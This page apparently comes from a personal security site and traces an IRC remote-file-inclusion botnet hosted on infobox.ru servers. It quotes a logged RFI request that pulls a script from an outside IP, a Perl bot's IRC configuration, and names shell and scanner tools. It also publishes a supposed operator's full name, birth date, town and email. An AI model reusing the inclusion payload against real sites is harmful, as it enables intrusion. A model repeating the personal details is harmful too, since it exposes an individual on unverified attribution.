infobox.ru: Botnet

Your botnet is now my botnet.. infobox.ru.

•A visitor from srv002.infobox.ru (77.221.130.2) came on 2009-05-09 20:20:32. The browser was Mozilla/5.0
◦This visitor first arrived without a referring URL
and visited /index.php?page=zeus/index1.php?c=http://125.163.251.219/har/fx29id1.txt?? encountering a 404 error 
◦1 seconds later, arrived without a referring URL,
and visited /index.php?page=404-error

Because of that statistics on this website I investigated the server and its irc botnet a bit. My final results where to trace the irc main bots (which are responsible for remote file inclusion) to following servers (including their irc name, source code file, version and info command):

srv002.infobox.ru   ContinueScan      continuescan.txt    Continue RFI Scanner v5.2   .info
srv002.infobox.ru   ContinueScan[2]   continue2.txt       Continue RFI Scanner v5.2   .info
srv015.infobox.ru   ContinueScan[3]   continue3.txt       Continue RFI Scanner v5.2   .info
srv017.infobox.ru   [unknown bot]
srv018.infobox.ru   ContinueScan[1]   continue1.txt       Continue RFI Scanner v5.2   .info
srv018.infobox.ru   ContinueRFI[1]    continuerfi.txt                                 !info
srv018.infobox.ru   ContinueRFI[383]  continuerfi.txt                                 !info

When visiting their http server (http://125.163.251.219/har/) where the included file is stored, you see the directory listing (due to a misconfiguration of Apache). This means all files and folders were visible on the server and could be accessed. When reading through the source files and who-is information it became clear that following person was responsible for the whole botnet ("the man behind"):

Nick : H4R
nama : harasin mokoginta
ttl : gorontalo,13 okteber 1987
kota : go-round-tallo
agama : islam
fs/e-mail : harasyeen_1320@yahoo.co.id
http://phlog.net/user/modero

The script botnet software on the server consisted of following "programs":

RFI Scanner Bot v5.0
v6 Scanner
prendedor.pl v1.7
r57 Shell
FaTaLisTiCz_Fx Fx29Sh 3.2.12.08
and some minor scripts

The used irc channel became clear with following code in one of the scripts:

##[ KONFIGURASI IRC ]##
my @servers = ("irc.continuecrew.co.cc","90.150.144.50"); #IRC Servers
(Separated by HaR)
my %bot = (
  nick => "ContinueScan[1]",
  ident => "Scanner",
  chan => ["#Continue"], #Channels to join (Separated by HaR)
  server => $servers[rand(scalar(@servers))],
  port => "6668"
);

Server   irc.continuecrew.co.cc
         90.150.144.50
Channel  #Continue
Port     6667 (previously)
         6668 (as of May 11, 2009)

These are the file that are stored on the server, all are some scripts used for remote file inclusion. Here is a diff I made when they changed servers and setted up the botnet:

Download the full report (pdf).

^ Top
Last modified: 2 February 2010

Previous page: ZeuS
Next page: Operating System Development